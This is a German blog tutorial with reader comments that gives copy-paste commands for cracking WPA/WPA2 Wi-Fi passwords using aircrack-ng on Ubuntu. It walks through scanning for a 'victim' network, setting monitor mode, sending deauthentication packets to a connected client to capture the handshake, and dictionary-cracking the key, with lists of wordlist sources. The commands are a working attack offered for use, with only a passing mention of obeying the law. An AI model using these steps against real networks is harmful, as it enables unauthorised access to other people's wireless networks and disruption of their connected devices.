Tutorial: Schnell und einfach WPA1 & WPA2 Wlan cracken (aircrack-ng & Ubuntu)

WiFi

WiFi

Diesmal aus der Quick&Dirty Tutorial Serie: Schnell und einfach WPA1/WPA2 “hacken”. Ein Tutorial  zum ausdrucken und überall mitnehmen. Dieser Hackguide ist kurz, umfassend und sehr effizient! Ich empfehle allerdings für Anfänger mein ausführlicheres Aircrack-ng WPA und WPA2 Crack Tutorial. Diese Version ist wirklich für portable Zwecke gedacht und ggf. zum direkten einfügen der Befehle in das Terminal von Ubuntu Linux. Diese Anleitung funktioniert allerdings nur mit einem angemeldeten Clienten im Wlan. (>>Hier gehts zur WEP Version)

Mein System:

Ubuntu 8.10 x86 32Bit mit Intel WiFi Link 5100 (Centrino2) Wlan Adapter
Aircrack-ng 32Bit Version
Wlan Adapter Name “wlan0″ bzw. “mon0″
BSSID des Opfer Wlans : 7E:40:80:00:14:6C
ESSID des Wlands: “testwlan” WPA2-PSK verschlüsselt
Wlan MAC des Clienten: AA:0F:B5:B2:BC:82
Meine “Wlan0″ Adapter Mac Adresse: 00:0F:AC:82:AC:82

Alle Befehle bitte als root ausführen! Sprich vor jedem Befehl ein “sudo” dransetzen oder gleich von Anfang an “sudo -s” eingeben und alle weiteren “sudo” Befehle vernachlässigen. Alle Befehle sind in einer Zeile geschrieben bitte lasst euch nicht vom Zeilenumbruch hier auf dieser Website irritieren!


0. Opfer Wlan suchen mit “airodump-ng”

sudo airodump-ng wlan0

1. Karte in Monitor Mode mit “airmon-ng” (z.B. Channel 6 für Opfer Wlan)

sudo airmon-ng start wlan0 6

Jetzt nur noch mon0 als Adapter Alias Namen für die Befehle verwenden!

1.1 Karte in Monitor Mode mit iwconfig und ifconfig (mit z.B. Channel 6 für Opfer Wlan)

sudo ifconfig wlan0 down sudo iwconfig wlan0 mode monitor sudo iwconfig wlan0 channel 6 sudo ifconfig wlan0 up

Jetzt einfach wlan0 weiter als Adapter Alias Namen verwenden bei den Befehlen!

2. Datenpakete bzw. Handshakes Sammeln mit “airodump-ng”

sudo airodump-ng -c 6 -w output --bssid 7E:40:80:00:14:6C wlan0

3. Es werden 8 DeAuth Pakete versenden mit “aireplay-ng”

sudo aireplay-ng -0 8 -a 7E:40:80:00:14:6C -c AA:0F:B5:B2:BC:82 wlan0

Sobald der Handshake aufgezeichnet wurde, benutzen wir direkt “aircrack-ng” um das Passwort herauszufinden.

4. Key aus dem Handshake cracken mit “aircrack-ng”

sudo aircrack-ng -a 2 -b 7E:40:80:00:14:6C -e testwlan -w <wordlist> *.cap

Fertig!

mit “-w <wordlist>” gebt ihr den Pfad zu eurer Wordlist/Rainbowtable an. Falls das Passwort zu komplex ist, sprich eine belibige Kombination von Buchstaben und Zahlen, könnt ihr es gleich vergessen. Wobei es inzwischen die “Möglichkeit” gibt mittels CUDA und Pyrit eine Bruteforce Attacke in sehr hoher Geschwindigkeit durchlaufen zu lassen. Zufallsgeneration von Kombinationen sind z.B. mit John TR Outputs möglich. Inzwischen ist es sogar möglich, ganz Wikipedia als Wordlist zu nutzen.

Wordlisten Links findet ihr hier:

  • ftp://ftp.openwall.com/pub/wordlists/
  • http://www.openwall.com/mirrors/
  • ftp://ftp.ox.ac.uk/pub/wordlists/
  • http://gdataonline.com/downloads/GDict/
  • http://www.theargon.com/achilles/wordlists/
  • http://theargon.com/achilles/wordlists/theargonlists/
  • ftp://ftp.cerias.purdue.edu/pub/dict/
  • http://www.outpost9.com/files/WordLists.html
  • http://www.securinfos.info/wordlists_dictionnaires.php
  • http://www.vulnerabilityassessment.co.uk/passwords.htm
  • http://packetstormsecurity.org/Crackers/wordlists/
  • http://www.ai.uga.edu/ftplib/natural-language/moby/
  • http://www.insidepro.com/eng/download.shtml
  • http://www.word-list.com/
  • http://www.cotse.com/tools/wordlists1.htm
  • http://www.cotse.com/tools/wordlists2.htm
  • http://www.phreak.org/index/archive01/hacking/wordlsts/wordlsts.shtml
  • http://wordlist.sourceforge.net/

Oder bastelt euch eure eigene Wordlist mit:

  • https://code.goto10.org/svn/unpacked/sh/etemenanki/etemenanki.sh
  • http://awlg.org/index.gen
  • http://forum.aircrack-ng.org/index.php?topic=4580.0
  • http://forum.aircrack-ng.org/index.php?topic=4877.msg27435#msg27435

Jedenfalls wünsche ich viel Spaß und beachtet die geltenden Gesetze – Euer SuperKato Team!

Zur Diskussion im Forum: Hier Klicken!

Download: Die Anleitung zum Ausdrucken als PDF Version (DIN A4 Format):

  SuperKato Tutorial: Quick & Dirty WPA WPA2 Cracking (73,9 KiB, 8.764 hits)

Nachtrag:

Kinder, wenn ihr Fragen habt wieso schreibt ihr nicht einfach ins Forum? Dort muss man sich nicht mal anmelden, damit ihr es bequemer habt?! Dort sind zwei Informatiker unterwegs, die extra für die Beantwortung eurer Fragen bezahlt werden!!

>>>>FORUM (Rubrik Security)

BTW: Bitte promotet das Forum! Es hat wirklich QUALITÄT – nur zuwenig User!



30 Responses to Tutorial: Schnell und einfach WPA1 & WPA2 Wlan cracken (aircrack-ng & Ubuntu)

  1. Thomas sagt:

    Ist es möglich eine beschreibung für Anfänger zu erstellen?
    Ich nutze xubuntu via USB……Danke!

    Daumen hoch 0 Daumen runter 0

  2. Storch sagt:

    und finde ich:

    “ausführlicheres Aircrack-ng WPA und WPA2 Crack Tutorial”

    Gruss.

    Daumen hoch 0 Daumen runter 0

  3. UUser sagt:

    Hallo,
    Ich würde auch zu gern den ausführlichen bericht bzw. das torurial lessen.
    Kannst du uns eine Hinweis geben wo wir es finden?

    Gruss

    Daumen hoch 0 Daumen runter 0

  4. m1k3y sagt:

    Geht das auch mit einem gewöhlichen Wireless USB Stick ?

    Daumen hoch 0 Daumen runter 1

  5. m1k3y sagt:

    Und wo soll man die Befehle eingeben ?

    Daumen hoch 0 Daumen runter 2

  6. Sam sagt:

    Mit Edding auf ein Papier schreiben und jeweils 3 Sekunden vor die Webcam halten.

    Well-loved. Like or Dislike: Daumen hoch 6 Daumen runter 0

  7. admin sagt:

    Zum Beispiel :D

    Daumen hoch 1 Daumen runter 0

  8. admin sagt:

    die Befehle gibst du im Terminal ein LOL

    Daumen hoch 1 Daumen runter 0

  9. ianmcmill sagt:

    warum unter punkt 1.1 nochmal die karte in monitor mode setzen ?
    das macht doch schon 1. “airmon-ng start wlanXXX #”
    mit “airmon-ng” sieht man dann > wlan0 blabla ; mon0 blabla

    Daumen hoch 0 Daumen runter 0

  10. julle sagt:

    Ich mach alles nach der Anleitung, aber beim letzten Befehl steht dann
    “No file to crack specified”

    was soll ich machen??
    hilfe
    ich hab die cap datei genauso eingegeben wies bei mir dann am ende steht

    Daumen hoch 0 Daumen runter 0

  11. Oliver sagt:

    Wie siehts denn mit XP aus?
    Welche Wlan karten sind mit Nettumbler kompatible????

    Daumen hoch 0 Daumen runter 0

  12. Samba sagt:

    oh mann so viele dumme Fragen hab ich noch nie auf einen Haufen gesehen.

    Daumen hoch 2 Daumen runter 0

  13. Cumbia sagt:

    ;-)

    Daumen hoch 0 Daumen runter 0

  14. equinoxx sagt:

    Hola zusammen,

    schick schick deine Anleitung! Vorallem das zusammenfassen der einzelnen Strings- damit spart man sich ne menge Arbeit ;)

    Ich bin gerade dabei zu beweisen das mein WPA2 mit 28stellen Buchstaben-Ziffern gemisch gecrackt wurde und damit illegale Sachen betrieben wurden. Da ich eine Firma mit verdammt vielen WLAN-abhängigen Geräten betreibe, fiel es mir leider erst sehr spät auf, daraufhin hab ich ALLES auf Auslieferung zurückgestellt- wollte ja niemanden etwas böses Unterstellen- leider war das wohl Vorsatz- jetzt kommt ne Klage mit rund 20.000 € auf mich zugeflogen! Da gilt es zu beweisen das es DOCH möglich ist ohne 100 Jahre Wartezeit aufs PW.

    Leute, passt auf was ihr tut! Wenn man Sicherheitslücken aufdecken möchte, ist das nutzen der besagten Programme durchaus legitim!

    Viele Grüße

    Daumen hoch 0 Daumen runter 0

  15. Buko sagt:

    Echt schlimm was manche Leute hier von sich geben… Lernt erstmal ein bisschen mit Linux umzugehen und Crackt erstmal WEP bevor ihr euch an WPA2 versucht!!! Wenn ich schon sowas von XP lese oder “wo soll ich die Befehle eingeben?” omg leute, das darf doch net wahr sein :D

    Daumen hoch 2 Daumen runter 0

  16. HAHA!!! sagt:

    Hey ne Frage,
    wie müssen die Wörter in der Wordlist angeordnet sein? Untereinander, sprich Zeile für Zeile oder hintereinander und aneinander?

    Daumen hoch 0 Daumen runter 1

  17. HAHA!!! sagt:

    Ach nochwas,

    Zahlen muss ich auch noch dazu schreiben oder mach er das selber?

    Daumen hoch 0 Daumen runter 1

  18. Cybemelone sagt:

    Danke erstmal – echt richtig super Tutorial!!!

    Und @HAHA!!!
    Die Wörter müssen untereinander angeordnet sein.

    Daumen hoch 0 Daumen runter 0

  19. Xan sagt:

    lol schaut mal youtube da gibts diverse tutorials ;3

    Daumen hoch 0 Daumen runter 0

  20. Habbak sagt:

    1. Gute Anleitung
    2. Danke dafür
    3. MICH KOTZEN DIESE SELBSTGEFÄLLIGEN TROTTEL HIER IM FORUM AN, DIE SICH OB DER NACHFRAGEN ANDERER DARÜBER LUSTIG MACHEN!!! ICH GLAUBE, JEDER HAT MAL “KLEIN” ANGEFANGEN!!! ODER HABT IHR ETWA SCHON ALLE DAS GEWUSST, WAS IHR HEUTE WISST, ALS IHR NOCH IN EURE WINDELN GESCHISSEN HABT???? HALTET EINFACH MAL DIE FRESSE UND LASST DIE LEUTE NACHFRAGEN. DAFÜR IST DAS FORUM IMMERHIN DA – ZUM MEINUNGS- UND ERFAHRUNGSAUSTAUSCH.

    Klaus

    Daumen hoch 0 Daumen runter 2

  21. Anonymous sagt:

    -sudo u fail all

    Daumen hoch 0 Daumen runter 0

  22. Karl sagt:

    -ps ux
    -kill pid dich

    Daumen hoch 0 Daumen runter 0

  23. rix sagt:

    bin auch der meinung das man leuten helfen sollte wenn sie wo anstehen, aber wen mir der befehl “sudo” nix sagt und ich nicht weiss wo ich befehle eingeben sollte dann wäre es besser mal die besagten systeme kennenzulernen und sich mit dem offensichtlichen zu beschäftigen bevor ich mich in die tiefen des nicht offensichtlichen wage! lernt mal eure betriebsysteme kennen und danach, schwelgt ein wenig im thema netzwerktechnik, ***nix, transferprotokoll, datenpakete/handshakes, verschlüsselung, usw… dann werdet ihr annähernd verstehen um was es hier wirklich geht. es reicht nicht blind commands einzutippen man muss auch wissen was sie tun und warum man sie eintippt ;)
    und nicht vergessen wenn man in (fremde) netzwerke eindringt macht man sich strafbar also sollte ich auch genau wissen was ich für spuren hinterlasse… aber zu dem wirds ja wohl nie kommen wenn ich mir eure comments ansehe ;) )))

    Daumen hoch 2 Daumen runter 0

    • SK sagt:

      das freut mich! Man brauch vorerfahrung, das stimmt aber bitte schreibt doch einfach ins FORUM (KLICK OBEN AUF FORUM) da könnt ihr eure fragen in der RUBRIK SECURITY OHNE ANMELDUNG stellen und ich beantworte sie solange bis euch jedem geholfen ist!
      Ich muss das Forum vorrantreiben. Dies hier dient nur zu Kommentarzwecken a la – cool- danke – super- igitt…!

      LG SK

      Daumen hoch 0 Daumen runter 0

  24. croal sagt:

    wollte im forum schreiben aber bekomme die meldung fehlerhafte antwort. bei der umfrage welche karte ich hätte. naja intel 4965agn..

    Daumen hoch 0 Daumen runter 1

  25. SK sagt:

    ja weil unten eine Frage steht die beantwortet werden muss als Captcha…wenn du keinen Account hast.

    Daumen hoch 1 Daumen runter 0

Hinterlasse eine Antwort

Deine E-Mail-Adresse wird nicht veröffentlicht.

Du kannst folgende HTML-Tags benutzen: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>